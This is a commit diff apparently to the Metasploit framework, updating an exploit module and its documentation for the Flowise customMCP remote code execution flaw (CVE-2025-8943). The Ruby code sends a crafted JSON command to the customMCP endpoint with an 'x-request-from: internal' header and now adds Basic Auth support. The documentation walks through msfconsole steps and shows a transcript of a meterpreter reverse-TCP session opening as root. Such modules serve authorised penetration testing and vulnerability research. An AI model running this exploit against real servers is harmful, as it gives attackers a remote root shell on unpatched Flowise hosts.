Improve Flowise CustomMCP RCE exploit stability with Basic Auth support and HTTP response validation

Author: Chocapikk

documentation/modules/exploit/multi/http/flowise_custommcp_rce.md

@@ -1,12 +1,15 @@
 ## Vulnerable Application
 
-[Flowise](https://github.com/FlowiseAI/Flowise) is an open-source platform for building AI agents. Versions prior to 3.0.1 are vulnerable
-to an unauthenticated remote command execution vulnerability (CVE-2025-8943) in the customMCP endpoint.
+[Flowise](https://github.com/FlowiseAI/Flowise) is an open-source platform for building AI agents. Versions >= 2.2.7-patch.1 and < 3.0.1 are vulnerable
+to a remote command execution vulnerability (CVE-2025-8943) in the customMCP endpoint.
 
-The vulnerability exists in the `/api/v1/node-load-method/customMCP` endpoint which allows unauthenticated users to execute arbitrary
-commands by sending a specially crafted JSON payload. The endpoint accepts a command and arguments that are executed directly on the system.
+The vulnerability exists in the `/api/v1/node-load-method/customMCP` endpoint which allows users to execute arbitrary
+commands by sending a specially crafted JSON payload. The endpoint accepts a command and arguments that are executed directly on the system
+via StdioClientTransport. When FLOWISE_USERNAME and FLOWISE_PASSWORD environment variables are not configured, the exploit works unauthenticated
+by using the 'x-request-from: internal' header. If Basic Auth is enabled, the module supports providing credentials via the FLOWISE_USERNAME
+and FLOWISE_PASSWORD options.
 
-This vulnerability affects Flowise versions < 3.0.1.
+This vulnerability affects Flowise versions >= 2.2.7-patch.1 (introduced March 14, 2025) and < 3.0.1 (fixed May 29, 2025).
 
 This module was successfully tested on:
 
@@ -60,6 +63,14 @@ services:
 
 ## Options
 
+**FLOWISE_USERNAME** (optional): Flowise username for Basic Auth. Required if the target has FLOWISE_USERNAME environment variable configured.
+
+**FLOWISE_PASSWORD** (optional): Flowise password for Basic Auth. Required if the target has FLOWISE_PASSWORD environment variable configured.
+
+**Note**: The module automatically handles authentication. If Basic Auth is not configured on the target, the exploit works unauthenticated.
+If Basic Auth is enabled, you must provide credentials using the FLOWISE_USERNAME and FLOWISE_PASSWORD options. The module includes
+improved error handling with HTTP response code validation (200 = success, 401 = authentication required, 404 = endpoint not found, etc.)
+
 
 ## Scenarios
 

documentation/modules/exploit/multi/http/flowise_custommcp_rce_cve_2025_8943.md

@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+[Flowise](https://github.com/FlowiseAI/Flowise) is an open-source platform for building AI agents. Versions >= 2.2.7-patch.1 and < 3.0.1 are vulnerable to a remote command execution vulnerability (CVE-2025-8943) in the customMCP endpoint.
+
+The vulnerability exists in the `/api/v1/node-load-method/customMCP` endpoint which allows users to execute arbitrary commands by sending a specially crafted JSON payload. The endpoint accepts a command and arguments that are executed directly on the system
+via StdioClientTransport. When FLOWISE_USERNAME and FLOWISE_PASSWORD environment variables are not configured, the exploit works unauthenticated
+by using the 'x-request-from: internal' header. If Basic Auth is enabled, the module supports providing credentials via the FLOWISE_USERNAME
+and FLOWISE_PASSWORD options.
+
+This vulnerability affects Flowise versions >= 2.2.7-patch.1 (introduced March 14, 2025) and < 3.0.1 (fixed May 29, 2025).
+
+This module was successfully tested on:
+
+    * Flowise 3.0.0 installed with Docker
+
+### Installation
+
+1. `git clone https://github.com/FlowiseAI/Flowise.git`
+
+2. `cd Flowise`
+
+3. `git checkout flowise@3.0.0`
+
+4. `cd docker`
+
+5. `cp .env.example .env`
+
+6. Edit `docker-compose.yml` and set the image to `flowiseai/flowise:3.0.0`:
+
+```yaml
+services:
+  flowise:
+    image: flowiseai/flowise:3.0.0
+```
+
+7. `docker compose up -d`
+
+8. Verify the installation by checking http://127.0.0.1:3000/api/v1/version (should return `{"version":"3.0.0"}`)
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/flowise_custommcp_rce_cve_2025_8943`
+4. Do: `set RHOSTS <target_ip>`
+5. Do: `set LHOST <your_ip>`
+6. Do: `set FETCH_SRVHOST <your_ip>`
+7. Do: `run`
+8. You should get a meterpreter session
+
+
+## Options
+
+**FLOWISE_USERNAME** (optional): Flowise username for Basic Auth. Required if the target has FLOWISE_USERNAME environment variable configured.
+
+**FLOWISE_PASSWORD** (optional): Flowise password for Basic Auth. Required if the target has FLOWISE_PASSWORD environment variable configured.
+
+**Note**: The module automatically handles authentication. If Basic Auth is not configured on the target, the exploit works unauthenticated.
+If Basic Auth is enabled, you must provide credentials using the FLOWISE_USERNAME and FLOWISE_PASSWORD options. The module includes
+improved error handling with HTTP response code validation (200 = success, 401 = authentication required, 404 = endpoint not found, etc.)
+
+
+## Scenarios
+
+### Flowise 3.0.0 on Linux (Docker)
+
+```
+msf6 > use exploit/multi/http/flowise_custommcp_rce_cve_2025_8943
+[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/flowise_custommcp_rce_cve_2025_8943) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/flowise_custommcp_rce_cve_2025_8943) > set RPORT 3000
+RPORT => 3000
+msf6 exploit(multi/http/flowise_custommcp_rce_cve_2025_8943) > set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/flowise_custommcp_rce_cve_2025_8943) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(multi/http/flowise_custommcp_rce_cve_2025_8943) > set LPORT 5555
+LPORT => 5555
+msf6 exploit(multi/http/flowise_custommcp_rce_cve_2025_8943) > set FETCH_SRVHOST 172.17.0.1
+FETCH_SRVHOST => 172.17.0.1
+msf6 exploit(multi/http/flowise_custommcp_rce_cve_2025_8943) > set FETCH_SRVPORT 8081
+FETCH_SRVPORT => 8081
+msf6 exploit(multi/http/flowise_custommcp_rce_cve_2025_8943) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:5555 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Flowise version detected: 3.0.0
+[+] The target appears to be vulnerable. Version 3.0.0 is vulnerable to CVE-2025-8943
+[*] Sending stage (3090404 bytes) to 172.23.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:5555 -> 172.23.0.2:36184) at 2025-11-18 21:45:37 +0100
+
+meterpreter > sysinfo
+Computer        : docker-flowise-1
+OS              : Linux
+Architecture    : x64
+System Language : en_US.UTF-8
+Meterpreter     : x64/linux
+meterpreter > getuid
+Server username: root
+```
+

modules/exploits/multi/http/flowise_custommcp_rce.rb

@@ -13,13 +13,14 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Flowise Custom MCP Remote Command Execution (CVE-2025-8943)',
+        'Name' => 'Flowise Custom MCP Remote Code Execution',
         'Description' => %q{
-          This module exploits an unauthenticated remote command execution vulnerability
-          in Flowise versions < 3.0.1. The vulnerability exists in the customMCP endpoint
-          (/api/v1/node-load-method/customMCP) which allows unauthenticated users to execute
-          arbitrary commands by sending a specially crafted JSON payload.
-          The endpoint accepts a command and arguments that are executed directly on the system.
+          This module exploits a remote code execution vulnerability in Flowise versions >= 2.2.7-patch.1
+          and < 3.0.1. The vulnerability exists in the customMCP endpoint (/api/v1/node-load-method/customMCP)
+          located in packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts and packages/components/nodes/tools/MCP/core.ts,
+          which allows users to execute arbitrary commands via StdioClientTransport by using the 'x-request-from: internal' header.
+          When FLOWISE_USERNAME and FLOWISE_PASSWORD are not configured, the exploit works unauthenticated. If Basic Auth is
+          enabled, the FLOWISE_USERNAME and FLOWISE_PASSWORD options must be set to provide credentials.
         },
         'Author' => [
           'Assaf Levkovich', # Vulnerability discovery (JFrog)
@@ -54,8 +55,7 @@ def initialize(info = {})
         'DisclosureDate' => '2025-08-14',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'RPORT' => 3000,
-          'SSL' => false
+          'RPORT' => 3000
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -64,6 +64,11 @@ def initialize(info = {})
         }
       )
     )
+
+    register_options([
+      OptString.new('FLOWISE_USERNAME', [false, 'Flowise username for Basic Auth (required if FLOWISE_USERNAME env var is set)', '']),
+      OptString.new('FLOWISE_PASSWORD', [false, 'Flowise password for Basic Auth (required if FLOWISE_PASSWORD env var is set)', ''])
+    ])
   end
 
   def check
@@ -78,12 +83,15 @@ def check
 
     json_data = res.get_json_document
     version_str = json_data['version']
-    return CheckCode::Unknown('Could not retrieve Flowise version') if version_str.nil? || version_str.to_s.empty?
+    return CheckCode::Detected('Could not retrieve Flowise version') if version_str.blank?
 
     version = Rex::Version.new(version_str)
     print_status("Flowise version detected: #{version}")
 
-    return CheckCode::Appears("Version #{version} is vulnerable to CVE-2025-8943") if version < Rex::Version.new('3.0.1')
+    # Vulnerability introduced in 2.2.7-patch.1 (March 14, 2025) and fixed in 3.0.1 (May 29, 2025)
+    if version >= Rex::Version.new('2.2.7') && version < Rex::Version.new('3.0.1')
+      return CheckCode::Appears("Version #{version} is vulnerable (affected: >= 2.2.7-patch.1 and < 3.0.1)")
+    end
 
     CheckCode::Safe("Version #{version} is not vulnerable")
   end
@@ -108,22 +116,50 @@ def execute_command(cmd, _opts = {})
     }
 
     exploit_url = normalize_uri(target_uri.path, 'api', 'v1', 'node-load-method', 'customMCP')
-    res = send_request_cgi({
+
+    request_opts = {
       'uri' => exploit_url,
       'method' => 'POST',
       'ctype' => 'application/json',
       'headers' => {
         'x-request-from' => 'internal'
       },
       'data' => payload.to_json
-    })
+    }
 
-    return false unless res
+    # Add Basic Auth if credentials are provided
+    if !datastore['FLOWISE_USERNAME'].blank? && !datastore['FLOWISE_PASSWORD'].blank?
+      request_opts['username'] = datastore['FLOWISE_USERNAME']
+      request_opts['password'] = datastore['FLOWISE_PASSWORD']
+    end
+
+    res = send_request_cgi(request_opts)
 
-    true
+    unless res
+      vprint_error('No response from server')
+      return false
+    end
+
+    case res.code
+    when 200
+      vprint_status('Command sent successfully (HTTP 200)')
+      return true
+    when 401
+      vprint_error('Authentication required - check FLOWISE_USERNAME and FLOWISE_PASSWORD options')
+      return false
+    when 404
+      vprint_error('Endpoint not found - target may not be vulnerable or CustomMCP not available')
+      return false
+    when 500
+      vprint_error('Server error - command may have failed to execute')
+      return true
+    else
+      vprint_warning("Unexpected HTTP response code: #{res.code}")
+      return true
+    end
   end
 
   def exploit
-    execute_command(payload.encoded)
+    fail_with(Failure::PayloadFailed, 'Failed to run payload') unless execute_command(payload.encoded)
   end
 end